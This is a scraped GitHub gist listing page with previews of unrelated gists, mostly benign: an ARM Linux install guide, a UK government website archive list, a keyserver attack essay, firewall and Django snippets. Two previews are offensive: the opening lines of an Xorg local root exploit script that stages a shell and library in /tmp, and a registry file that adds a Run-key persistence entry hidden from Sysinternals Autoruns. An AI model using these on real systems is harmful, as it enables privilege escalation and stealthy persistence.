Skip to content

Instantly share code, notes, and snippets.

Avatar

Paweł Krawczyk kravietz

View GitHub Profile
@larsch
larsch / archlinuxarm-on-nanopi-r2s.md
Created Oct 10, 2020
Installing Arch Linux AArch64 on the NanoPi R2S
View archlinuxarm-on-nanopi-r2s.md

Installing Arch Linux AArch64 on the NanoPi R2S

There is current no support for the NanoPi R2S in ArchLinuxArm, but it's possible to run it using the generic aarch64 installation.

Prepare sd-card/image

  1. Copy bootloader and uBoot from an armbian image using for the NanoPi R2S using dd (sectors 32 to 32767) everything before the partition, except the partition table).
  2. Create an ext4 partition on /dev/mmcblk0p1 at offset of 32768 sectors (16384 KiB):
Device         Boot Start      End  Sectors  Size Id Type
@dwisiswant0
dwisiswant0 / st8out.sh
Last active Mar 17, 2021
St8out - Extra one-liner for reconnaissance
View st8out.sh
#!/bin/bash
#####
#
# St8out - Extra one-liner for reconnaissance
#
# Usage: ./st8out.sh target.com
#
# Resources:
# - https://github.com/j3ssie/metabigor
@Jonty
Jonty / uk_gov_websites_archive.md
Last active Jul 28, 2020
The earliest Archive.org snapshot of every UK Government domain
View uk_gov_websites_archive.md

Recently @alexparsons asked Democracy Club what the earliest local authority website was. Nobody knew, but we had fun looking at pages from 1996.

I pulled up my old IPv4 reverse DNS scan of .gov.uk domains, and the official list of .gov.uk domains, then queried the internet archive for each one.

The list below is every UK Government website sorted by the first time the Internet Archive saved a copy.

The links go to the archived version of the site at that time. Expect to get nostalgic. - @jonty

Archive date Domain
@rjhansen
rjhansen / keyservers.md
Last active Apr 8, 2021
SKS Keyserver Network Under Attack
View keyservers.md

SKS Keyserver Network Under Attack

This work is released under a Creative Commons Attribution-NoDerivatives 4.0 International License.

Terminological Note

"OpenPGP" refers to the OpenPGP protocol, in much the same way that HTML refers to the protocol that specifies how to write a web page. "GnuPG", "SequoiaPGP", "OpenPGP.js", and others are implementations of the OpenPGP protocol in the same way that Mozilla Firefox, Google Chromium, and Microsoft Edge refer to software packages that process HTML data.

Who am I?

View x0rg.sh
#!/bin/bash
# x0rg - Xorg Local Root Exploit
# Released under the Snitches Get Stitches Public Licence.
# props to prdelka / fantastic for the shadow vector.
# Gr33tz to everyone in #lizardhq and elsewhere <3
# ~infodox (25/10/2018)
# FREE LAURI LOVE!
echo "x0rg"
echo "[+] First, we create our shell and library..."
cat << EOF > /tmp/libhax.c
@ruario
ruario / 1-README.md
Last active Apr 4, 2021
A script that fetches a ChromeOS image for ARM32 and extracts the Widevine and Flash binaries, saving them in a compressed archive for use with Vivaldi
View 1-README.md

The included script 'widevine-flash_armhf.sh' fetches a ChromeOS image for ARM and extracts the Widevine and Flash binaries, saving them in a compressed archive. Since it downloads a fairly large file (2Gb+ on disk after download) it is recommended that you run the script on a machine that has plenty of disk space.

To install the resultant archive, issue the following on your ARM machine–after copying over the archive if needed:

sudo tar Cfx / widevine-flash-20200124_armhf.tgz

(Where 'widevine-flash-20200124_armhf.tgz' is updated to reflect the actual name of the created archive)

@gaoyifan
gaoyifan / tc-mark.nft
Created Sep 24, 2018
Traffic control mark with nftables
View tc-mark.nft
#! /usr/sbin/nft -f
chain tc-wan {
# check default priority
mark & 0xff0 == 0x130 ip dscp set af22 return
# real-time application
## Dota2
udp dport 27000-27200 \
meta mark set mark & 0xfffff00f ^ 0x110 ip dscp set af41 return
@sapran
sapran / mobileapppentestingworksho.md
Last active Jan 20, 2021
Links and snippets for mobile app pentesting workshop
@hasherezade
hasherezade / test.reg
Last active Aug 24, 2020
Demo: persistence key not visible for sysinternals autoruns (in a default configuration - read more: https://twitter.com/hasherezade/status/849756054145699840)
View test.reg
Windows Registry Editor Version 5.00
[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run]
@="Rundll32.exe SHELL32.DLL,ShellExec_RunDLL \"C:\\ProgramData\\test.exe\""
@baxeico
baxeico / allow_cors_mixin.py
Last active Aug 6, 2020
Simple mixin to add CORS headers in a Django View
View allow_cors_mixin.py
from django.http import HttpResponse
class AllowCORSMixin(object):
def add_access_control_headers(self, response):
response["Access-Control-Allow-Origin"] = "*"
response["Access-Control-Allow-Methods"] = "GET, OPTIONS"
response["Access-Control-Max-Age"] = "1000"
response["Access-Control-Allow-Headers"] = "X-Requested-With, Content-Type"